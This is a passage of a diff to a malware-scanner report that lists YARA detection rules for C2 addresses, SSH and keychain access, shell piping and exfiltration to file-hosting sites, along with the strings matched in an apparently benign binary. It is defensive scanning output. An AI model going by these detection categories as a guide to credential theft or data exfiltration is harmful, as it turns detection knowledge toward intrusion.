[http://%s](http://%s) | +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [endpoint_port](https://github.com/search?q=endpoint_port&type=code)
[internalPort](https://github.com/search?q=internalPort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
[parent_port](https://github.com/search?q=parent_port&type=code)
[received_ip](https://github.com/search?q=received_ip&type=code)
[relatedPort](https://github.com/search?q=relatedPort&type=code)
[requestPort](https://github.com/search?q=requestPort&type=code)
[required_ip](https://github.com/search?q=required_ip&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[simple_port](https://github.com/search?q=simple_port&type=code)
[source_port](https://github.com/search?q=source_port&type=code)
[allow_port](https://github.com/search?q=allow_port&type=code)
[basic_port](https://github.com/search?q=basic_port&type=code)
[multi_port](https://github.com/search?q=multi_port&type=code)
[parentPort](https://github.com/search?q=parentPort&type=code)
[publicPort](https://github.com/search?q=publicPort&type=code)
[remotePort](https://github.com/search?q=remotePort&type=code)
[sourcePort](https://github.com/search?q=sourcePort&type=code)
[debugPort](https://github.com/search?q=debugPort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[localPort](https://github.com/search?q=localPort&type=code)
[midi_port](https://github.com/search?q=midi_port&type=code)
[next_port](https://github.com/search?q=next_port&type=code)
[peer_port](https://github.com/search?q=peer_port&type=code)
[public_ip](https://github.com/search?q=public_ip&type=code)
[quic_port](https://github.com/search?q=quic_port&type=code)
[quiche_ip](https://github.com/search?q=quiche_ip&type=code)
[server_ip](https://github.com/search?q=server_ip&type=code)
[stun_port](https://github.com/search?q=stun_port&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code)
[turn_port](https://github.com/search?q=turn_port&type=code)
[any_port](https://github.com/search?q=any_port&type=code)
[check_ip](https://github.com/search?q=check_ip&type=code)
[peerPort](https://github.com/search?q=peerPort&type=code)
[seq_port](https://github.com/search?q=seq_port&type=code)
[set_port](https://github.com/search?q=set_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[udp_port](https://github.com/search?q=udp_port&type=code)
[firstIp](https://github.com/search?q=firstIp&type=code)
[hasPort](https://github.com/search?q=hasPort&type=code)
[kPort](https://github.com/search?q=kPort&type=code)
[on_ip](https://github.com/search?q=on_ip&type=code)
[uv_ip](https://github.com/search?q=uv_ip&type=code)
[yoIp](https://github.com/search?q=yoIp&type=code)
[hIp](https://github.com/search?q=hIp&type=code)
[lIp](https://github.com/search?q=lIp&type=code)
[pIp](https://github.com/search?q=pIp&type=code)
[xIp](https://github.com/search?q=xIp&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [server_address_](https://github.com/search?q=server_address_&type=code) | -| MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientId](https://github.com/search?q=clientId&type=code)
[client_id](https://github.com/search?q=client_id&type=code) | +| MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientId](https://github.com/search?q=clientId&type=code) | | MEDIUM | [c2/discovery/ip_dns_resolver](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#google_dns_ip) | contains Google Public DNS resolver IP | [8.8.4.4](https://github.com/search?q=8.8.4.4&type=code)
[8.8.8.8](https://github.com/search?q=8.8.8.8&type=code) | | MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#remote_control) | Uses terms that may reference remote control abilities | [remote control](https://github.com/search?q=remote+control&type=code) | -| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [FrameDropper](https://github.com/search?q=FrameDropper&type=code)
[eye_dropper](https://github.com/search?q=eye_dropper&type=code)
[openEyeDropper](https://github.com/search?q=openEyeDropper&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [Linux](https://github.com/search?q=Linux&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[https://](https://)
[macOS](https://github.com/search?q=macOS&type=code) | +| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [openEyeDropper](https://github.com/search?q=openEyeDropper&type=code)
[FrameDropper](https://github.com/search?q=FrameDropper&type=code)
[eye_dropper](https://github.com/search?q=eye_dropper&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Linux](https://github.com/search?q=Linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip_writer](https://github.com/search?q=zip_writer&type=code) | -| MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[LevelDBIterator](https://github.com/search?q=LevelDBIterator&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBPartitionedLock](https://github.com/search?q=LevelDBPartitionedLock&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[LevelDBScopesKey](https://github.com/search?q=LevelDBScopesKey&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[leveldbH](https://github.com/search?q=leveldbH&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code) | +| MEDIUM | [collect/databases/leveldb](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/leveldb.yara#leveldb) | accesses LevelDB databases | [transactional_leveldb_iterator](https://github.com/search?q=transactional_leveldb_iterator&type=code)
[indexed_db_leveldb_operations](https://github.com/search?q=indexed_db_leveldb_operations&type=code)
[OpenAndVerifyLevelDBDatabase](https://github.com/search?q=OpenAndVerifyLevelDBDatabase&type=code)
[LevelDBPartitionedLock](https://github.com/search?q=LevelDBPartitionedLock&type=code)
[LevelDBScopesMetadata](https://github.com/search?q=LevelDBScopesMetadata&type=code)
[LevelDBScopesUndoTask](https://github.com/search?q=LevelDBScopesUndoTask&type=code)
[proto_leveldb_wrapper](https://github.com/search?q=proto_leveldb_wrapper&type=code)
[LEVELDB_TRANSACTION](https://github.com/search?q=LEVELDB_TRANSACTION&type=code)
[leveldb_value_store](https://github.com/search?q=leveldb_value_store&type=code)
[LevelDBTransaction](https://github.com/search?q=LevelDBTransaction&type=code)
[LevelDBWriteErrors](https://github.com/search?q=LevelDBWriteErrors&type=code)
[LevelDBOpenErrors](https://github.com/search?q=LevelDBOpenErrors&type=code)
[LevelDBReadErrors](https://github.com/search?q=LevelDBReadErrors&type=code)
[OpenLevelDBScopes](https://github.com/search?q=OpenLevelDBScopes&type=code)
[LEVELDB_DATABASE](https://github.com/search?q=LEVELDB_DATABASE&type=code)
[LEVELDB_ITERATOR](https://github.com/search?q=LEVELDB_ITERATOR&type=code)
[LevelDBScopesKey](https://github.com/search?q=LevelDBScopesKey&type=code)
[leveldb_database](https://github.com/search?q=leveldb_database&type=code)
[LevelDBIterator](https://github.com/search?q=LevelDBIterator&type=code)
[LevelDBWrapper](https://github.com/search?q=LevelDBWrapper&type=code)
[leveldb_chrome](https://github.com/search?q=leveldb_chrome&type=code)
[leveldb_scopes](https://github.com/search?q=leveldb_scopes&type=code)
[leveldb_proto](https://github.com/search?q=leveldb_proto&type=code)
[lazy_leveldb](https://github.com/search?q=lazy_leveldb&type=code)
[MojoLevelDB](https://github.com/search?q=MojoLevelDB&type=code)
[LevelDBEnv](https://github.com/search?q=LevelDBEnv&type=code)
[leveldb_0x](https://github.com/search?q=leveldb_0x&type=code)
[LevelDBIH](https://github.com/search?q=LevelDBIH&type=code)
[leveldbH](https://github.com/search?q=leveldbH&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | | MEDIUM | [credential/keychain](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain) | accesses a keychain | [Keychain](https://github.com/search?q=Keychain&type=code)
[keychain](https://github.com/search?q=keychain&type=code) | | MEDIUM | [credential/sniffer/bpf](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/sniffer/bpf.yara#sniffer_bpf) | BPF (Berkeley Packet Filter) | [bpf](https://github.com/search?q=bpf&type=code) | | MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [.ssh](https://github.com/search?q=.ssh&type=code) | | MEDIUM | [crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext) | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code)
[openssl](https://github.com/search?q=openssl&type=code) | -| MEDIUM | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | [#"!](https://github.com/search?q=%23%22%21&type=code)
$opt0
$opt1
$opt2
$opt30
$opt4
$opt5
$opt6
$opt7
['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*)(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[](https://github.com/search?q=%83%82%81%80&type=code)
[](https://github.com/search?q=%87%86%85%84&type=code)
[](https://github.com/search?q=%8B%8A%89%88&type=code)
[](https://github.com/search?q=%8F%8E%8D%8C&type=code)
[](https://github.com/search?q=%93%92%91%90&type=code)
[](https://github.com/search?q=%97%96%95%94&type=code)
[](https://github.com/search?q=%9B%9A%99%98&type=code)
[](https://github.com/search?q=%9F%9E%9D%9C&type=code)
[](https://github.com/search?q=%A3%A2%A1%A0&type=code)
[](https://github.com/search?q=%A7%A6%A5%A4&type=code)
[](https://github.com/search?q=%AB%AA%A9%A8&type=code)
[](https://github.com/search?q=%AF%AE%AD%AC&type=code)
[](https://github.com/search?q=%B3%B2%B1%B0&type=code)
[](https://github.com/search?q=%B7%B6%B5%B4&type=code)
[](https://github.com/search?q=%BB%BA%B9%B8&type=code)
[](https://github.com/search?q=%BF%BE%BD%BC&type=code)
[](https://github.com/search?q=%C3%C2%C1%C0&type=code)
[](https://github.com/search?q=%C7%C6%C5%C4&type=code)
[](https://github.com/search?q=%CB%CA%C9%C8&type=code)
[](https://github.com/search?q=%CF%CE%CD%CC&type=code)
[](https://github.com/search?q=%D3%D2%D1%D0&type=code)
[](https://github.com/search?q=%D7%D6%D5%D4&type=code)
[](https://github.com/search?q=%DB%DA%D9%D8&type=code)
[](https://github.com/search?q=%DF%DE%DD%DC&type=code)
[](https://github.com/search?q=%E3%E2%E1%E0&type=code)
[](https://github.com/search?q=%E7%E6%E5%E4&type=code)
[](https://github.com/search?q=%EB%EA%E9%E8&type=code)
[](https://github.com/search?q=%EF%EE%ED%EC&type=code)
[](https://github.com/search?q=%F3%F2%F1%F0&type=code)
[](https://github.com/search?q=%F7%F6%F5%F4&type=code)
[](https://github.com/search?q=%FB%FA%F9%F8&type=code)
[](https://github.com/search?q=%FF%FE%FD%FC&type=code) | +| MEDIUM | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_constants) | [rc4 constants](https://blog.talosintelligence.com/2014/06/an-introduction-to-recognizing-and.html), by shellcromancer | ['&%$](https://github.com/search?q=%27%26%25%24&type=code)
[+*)(](https://github.com/search?q=%2B%2A%29%28&type=code)
[/.-,](https://github.com/search?q=%2F.-%2C&type=code)
[3210](https://github.com/search?q=3210&type=code)
[7654](https://github.com/search?q=7654&type=code)
[;:98](https://github.com/search?q=%3B%3A98&type=code)
[?>=<](https://github.com/search?q=%3F%3E%3D%3C&type=code)
[CBA@](https://github.com/search?q=CBA%40&type=code)
[GFED](https://github.com/search?q=GFED&type=code)
[KJIH](https://github.com/search?q=KJIH&type=code)
[ONML](https://github.com/search?q=ONML&type=code)
[SRQP](https://github.com/search?q=SRQP&type=code)
[WVUT](https://github.com/search?q=WVUT&type=code)
[[ZYX](https://github.com/search?q=%5BZYX&type=code)
[_^]\](https://github.com/search?q=_%5E%5D%5C&type=code)
[cba`](https://github.com/search?q=cba%60&type=code)
[gfed](https://github.com/search?q=gfed&type=code)
[kjih](https://github.com/search?q=kjih&type=code)
[onml](https://github.com/search?q=onml&type=code)
[srqp](https://github.com/search?q=srqp&type=code)
[wvut](https://github.com/search?q=wvut&type=code)
[{zyx](https://github.com/search?q=%7Bzyx&type=code)
[#"!](https://github.com/search?q=%23%22%21&type=code) | | MEDIUM | [crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid) | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | -| MEDIUM | [data/embedded/base64_terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [DRVJUSUZJQ0FUR::$CERTIFICATE](https://github.com/search?q=DRVJUSUZJQ0FUR%3A%3A%24CERTIFICATE&type=code)
[Q0VSVElGSUNBVE::$CERTIFICATE](https://github.com/search?q=Q0VSVElGSUNBVE%3A%3A%24CERTIFICATE&type=code)
[RpcmVjdG9ye::$directory](https://github.com/search?q=RpcmVjdG9ye%3A%3A%24directory&type=code)
[ZGlyZWN0b3J5::$directory](https://github.com/search?q=ZGlyZWN0b3J5%3A%3A%24directory&type=code) | -| MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [aHR0cDovL::$http](https://github.com/search?q=aHR0cDovL%3A%3A%24http&type=code)
[h0dHA6Ly::$http](https://github.com/search?q=h0dHA6Ly%3A%3A%24http&type=code)
[odHRwOi8v::$http](https://github.com/search?q=odHRwOi8v%3A%3A%24http&type=code)
[odHRwczovL::$https](https://github.com/search?q=odHRwczovL%3A%3A%24https&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | -| MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code)
[networkInterfaces](https://github.com/search?q=networkInterfaces&type=code) | +| MEDIUM | [data/embedded/base64_terms](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-terms.yara#contains_base64) | Contains base64 CERTIFICATE | [contains_base64::DRVJUSUZJQ0FUR](https://github.com/search?q=contains_base64%3A%3ADRVJUSUZJQ0FUR&type=code)
[contains_base64::Q0VSVElGSUNBVE](https://github.com/search?q=contains_base64%3A%3AQ0VSVElGSUNBVE&type=code)
[contains_base64::ZGlyZWN0b3J5](https://github.com/search?q=contains_base64%3A%3AZGlyZWN0b3J5&type=code)
[contains_base64::RpcmVjdG9ye](https://github.com/search?q=contains_base64%3A%3ARpcmVjdG9ye&type=code) | +| MEDIUM | [data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url) | Contains base64 url | [contains_base64_url::odHRwczovL](https://github.com/search?q=contains_base64_url%3A%3AodHRwczovL&type=code)
[contains_base64_url::aHR0cDovL](https://github.com/search?q=contains_base64_url%3A%3AaHR0cDovL&type=code)
[contains_base64_url::odHRwOi8v](https://github.com/search?q=contains_base64_url%3A%3AodHRwOi8v&type=code)
[contains_base64_url::h0dHA6Ly](https://github.com/search?q=contains_base64_url%3A%3Ah0dHA6Ly&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[[](https://github.com/search?q=%3Chtml%3E&type=code) | +| MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [networkInterfaces](https://github.com/search?q=networkInterfaces&type=code)
[freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code)
[ifconfig](https://github.com/search?q=ifconfig&type=code) | | MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [macAddress](https://github.com/search?q=macAddress&type=code) | | MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/process/runtime_deps](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/runtime_deps.yara#tls_get_addr) | [looks up thread private variables, may be used for loaded library discovery](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | -| MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | +| MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code)
[process.arch](https://github.com/search?q=process.arch&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | -| MEDIUM | [discover/user/USERPROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USERPROFILE.yara#USERPROFILE_Desktop) | Looks up the Desktop directory for the current user | [Desktop](https://github.com/search?q=Desktop&type=code)
[USERPROFILE](https://github.com/search?q=USERPROFILE&type=code) | +| MEDIUM | [discover/user/USERPROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USERPROFILE.yara#USERPROFILE_Desktop) | Looks up the Desktop directory for the current user | [USERPROFILE](https://github.com/search?q=USERPROFILE&type=code)
[Desktop](https://github.com/search?q=Desktop&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | | MEDIUM | [evasion/file/location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | | MEDIUM | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace) | trace or modify system calls | [ptrace](https://github.com/search?q=ptrace&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code)
[ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | | MEDIUM | [exec/shell/pipe_sh](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/pipe_sh.yara#pipe_to_shell) | pipes to shell | [| sh](https://github.com/search?q=%7C+sh&type=code) | | MEDIUM | [exec/tty/pathname](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/tty/pathname.yara#ttyname) | returns the pathname of a terminal device | [ttyname](https://github.com/search?q=ttyname&type=code) | -| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code) | -| MEDIUM | [exfil/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/upload.yara#google_drive) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [drive.google.com/](https://github.com/search?q=drive.google.com%2F&type=code)
[drive.google.comtabs](https://github.com/search?q=drive.google.comtabs&type=code) | +| MEDIUM | [exfil/office_file_ext](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/office_file_ext.yara#office_extensions) | References multiple Office file extensions (possible exfil) | [docx](https://github.com/search?q=docx&type=code)
[xlsx](https://github.com/search?q=xlsx&type=code)
[eml](https://github.com/search?q=eml&type=code)
[ppt](https://github.com/search?q=ppt&type=code)
[pst](https://github.com/search?q=pst&type=code) | +| MEDIUM | [exfil/upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/upload.yara#google_drive) | [References known file hosting site](https://github.com/ditekshen/detection/blob/e6579590779f62cbe7f5e14b5be7d77b2280f516/yara/indicator_high.yar#L1001) | [drive.google.comtabs](https://github.com/search?q=drive.google.comtabs&type=code)
[drive.google.com/](https://github.com/search?q=drive.google.com%2F&type=code) | | MEDIUM | [fs/file/copy](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-copy.yara#file_copy) | copy files using cp | [copyFile](https://github.com/search?q=copyFile&type=code) | -| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileAndStart](https://github.com/search?q=CreateFileAndStart&type=code)
[CreateFileAndWrite](https://github.com/search?q=CreateFileAndWrite&type=code)
[CreateFileHelper](https://github.com/search?q=CreateFileHelper&type=code)
[CreateFileOpenDial](https://github.com/search?q=CreateFileOpenDial&type=code)
[CreateFileToTrunca](https://github.com/search?q=CreateFileToTrunca&type=code)
[CreateFileURLLoade](https://github.com/search?q=CreateFileURLLoade&type=code)
[CreateFileWriterIm](https://github.com/search?q=CreateFileWriterIm&type=code) | -| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileCallback](https://github.com/search?q=DeleteFileCallback&type=code)
[DeleteFileError](https://github.com/search?q=DeleteFileError&type=code)
[DeleteFileOnFileSe](https://github.com/search?q=DeleteFileOnFileSe&type=code) | +| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileAndStart](https://github.com/search?q=CreateFileAndStart&type=code)
[CreateFileAndWrite](https://github.com/search?q=CreateFileAndWrite&type=code)
[CreateFileOpenDial](https://github.com/search?q=CreateFileOpenDial&type=code)
[CreateFileToTrunca](https://github.com/search?q=CreateFileToTrunca&type=code)
[CreateFileURLLoade](https://github.com/search?q=CreateFileURLLoade&type=code)
[CreateFileWriterIm](https://github.com/search?q=CreateFileWriterIm&type=code)
[CreateFileHelper](https://github.com/search?q=CreateFileHelper&type=code) | +| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileCallback](https://github.com/search?q=DeleteFileCallback&type=code)
[DeleteFileOnFileSe](https://github.com/search?q=DeleteFileOnFileSe&type=code)
